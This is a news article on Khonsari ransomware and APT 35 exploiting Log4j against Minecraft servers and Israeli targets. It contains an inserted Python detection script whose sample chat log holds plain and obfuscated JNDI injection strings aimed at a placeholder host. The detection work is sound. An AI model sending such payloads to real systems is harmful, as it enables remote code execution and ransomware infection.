Ransomware Gang Hijacking Log4j Bug To Hit Minecraft Servers

Outside of the ransomware space, Iranian hacking group APT 35 has attempted to exploit the Log4j flaw against seven targets in the Israeli government and business sector over the past day, Check Point said.


A small number of Minecraft customers running their own servers with a vulnerable version of Log4j have been hit with Khonsari ransomware, Microsoft reported Wednesday.

The Redmond, Wash.-based software giant said adversaries have been sending malicious in-game messages to vulnerable Minecraft servers. Those messages exploit the Log4j vulnerability to retrieve and execute an attacker-hosted payload on both the server and any connected vulnerable clients, according to Microsoft.

“Due to the shifts in the threat landscape, Microsoft reiterates the guidance for Minecraft customers running their own servers to deploy the latest Minecraft server update and for players to exercise caution by only connecting to trusted Minecraft servers,” Microsoft’s unified threat intelligence team wrote in a blog post.


[Related: Nation-State, Ransomware Groups Using Log4j Bug In Attacks]

Minecraft customers playing on a server hosted by Microsoft had a patched version of the game download automatically after shutting down and restarting the Minecraft Launcher, according to Microsoft, which purchased the video game and accompanying intellectual property for $2.5 billion in 2014.

The Khonsari ransomware is packaged as a malicious Java class file and executed in the context of javaw.exe to ransom the device. Microsoft said its findings confirm Bucharest, Romania-based Bitdefender’s earlier report that Khonsari ransomware is being delivered as a payload following exploitation of the Log4j vulnerability.

While it’s uncommon for Minecraft to be installed in enterprise networks, Microsoft said it has also observed PowerShell-based reverse shells being dropped to Minecraft client systems via malicious in-game messages. This gives the adversary full access to a compromised system, which they can then use to run Mimikatz and steal credentials, according to Microsoft.

Microsoft said the dropping of PowerShell-based reverse shells is typically associated with enterprise compromises in hopes of facilitating lateral movement. However, Microsoft said it hasn’t observed any follow-on activity from the reverse shell campaign at this time, which indicates the threat group may be gathering access for later use.
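Because the Minecraft campaign described above is delivered through in-game chat, a server operator's own log is the natural place to look for it. The following detection script is an added example and not part of the article or of Microsoft's published tooling; it assumes the vanilla server's `[HH:MM:SS] [Server thread/INFO]: <player> message` chat-line layout, and the log lines and the `placeholder.invalid` host are constructed sample data.

```python
import re

# Vanilla Minecraft server chat line (format assumed for this example).
CHAT_LINE = re.compile(r"^\[(\d\d:\d\d:\d\d)\] \[[^\]]+/INFO\]: <([^>]+)> (.*)$")
# Innermost Log4j 2 lookup: no nested "${" or "}" inside the braces.
INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
JNDI = re.compile(r"\$\{jndi:", re.IGNORECASE)


def _reduce_once(message):
    """Resolve the first obfuscating lookup (lower/upper/default-value)
    the way Log4j would; leave jndi and unknown lookups in place."""
    for m in INNER_LOOKUP.finditer(message):
        inner = m.group(1)
        if inner.lower().startswith("jndi:"):
            continue                          # the thing we want to see
        if ":-" in inner:                     # ${env:MISSING:-j} -> "j"
            rep = inner.split(":-", 1)[1]
        else:
            name, _, arg = inner.partition(":")
            if name.lower() == "lower":
                rep = arg.lower()
            elif name.lower() == "upper":
                rep = arg.upper()
            else:
                continue                      # e.g. ${cost}: harmless, keep
        return message[:m.start()] + rep + message[m.end():], True
    return message, False


def normalize(message, max_steps=50):
    """Collapse nested obfuscation until only irreducible lookups remain."""
    for _ in range(max_steps):                # bounded: pathological input stops here
        message, changed = _reduce_once(message)
        if not changed:
            break
    return message


def scan_log(lines):
    """Return chat messages whose normalized form carries a JNDI lookup."""
    hits = []
    for line in lines:
        m = CHAT_LINE.match(line)
        if not m:
            continue                          # not a chat line
        ts, player, msg = m.groups()
        norm = normalize(msg)
        if JNDI.search(norm):
            hits.append({"time": ts, "player": player, "raw": msg, "normalized": norm})
    return hits


SAMPLE_LOG = [  # constructed sample lines; host is a placeholder
    "[12:00:01] [Server thread/INFO]: <alice> gg everyone",
    "[12:00:07] [Server thread/INFO]: <mallory> ${jndi:ldap://placeholder.invalid/a}",
    "[12:00:09] [Server thread/INFO]: <mallory> ${${lower:J}${::-n}di:${lower:LDAP}://placeholder.invalid/b}",
    "[12:00:12] [Server thread/INFO]: <bob> price is ${cost}",
]
```

Run `scan_log(SAMPLE_LOG)` to see both of mallory's messages flagged with their de-obfuscated form, while bob's ordinary `${cost}` text is not.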

Minecraft has directed customers hosting their own servers to either download a file to the working directory where their server runs or add JVM arguments to their startup command line depending on which version they’re using. Also, modified clients and third-party launchers might not automatically update, and Minecraft has told users in that position to follow the advice of their third-party provider.

Microsoft’s warning about Khonsari ransomware comes two days after Bitdefender said the nascent ransomware family was attempting to exploit the Log4j vulnerability against users running Windows operating systems. A malicious .NET binary file downloaded as part of the ransomware attack will list all the drives on the user’s system and encrypt them entirely, except the C:\ drive, Bitdefender said.

On the C:\ drive, Bitdefender said, Khonsari encrypts only the Documents, Videos, Pictures, Downloads and Desktop files. A ransom note from Khonsari is written in the Desktop folder of the C:\ drive and opened with Notepad, according to Bitdefender.

“Your files have been encrypted and stolen by the Khonsari family,” Khonsari writes in its ransom note, according to Bitdefender. “If you wish to decrypt, call (***) ***-1309 or email kar***[email protected] If you do not know how to buy btc [Bitcoin], use a search engine to find exchanges. DO NOT MODIFY OR DELETE THIS FILE OR ANY ENCRYPTED FILES. IF YOU DO, YOUR FILES MAY BE UNRECOVERABLE.”

Outside of the ransomware arena, Check Point said Wednesday that state-sponsored Iranian hacking group APT 35 has attempted to exploit the Log4j vulnerability against seven targets in the Israeli government and business sector over the preceding 24 hours. Check Point witnessed communications between a server used by APT 35 and its targets in Israel, and was therefore able to block these attacks.

The attack took place between 9 a.m. ET and 7 p.m. ET Wednesday, and Check Point said it has no evidence of related APT 35 activity against targets outside Israel. APT 35’s Israel-focused campaign came a day after Check Point found that an attempt to exploit the Log4j vulnerability had resulted in a real-life attack by a crypto mining group against five countries.

“Reports of the last 48 hours prove that both criminal hacking groups and nation state actors are engaged in the exploration of this vulnerability, and we should all assume more such actors’ operations are to be revealed in the coming days,” Check Point wrote in a blog post.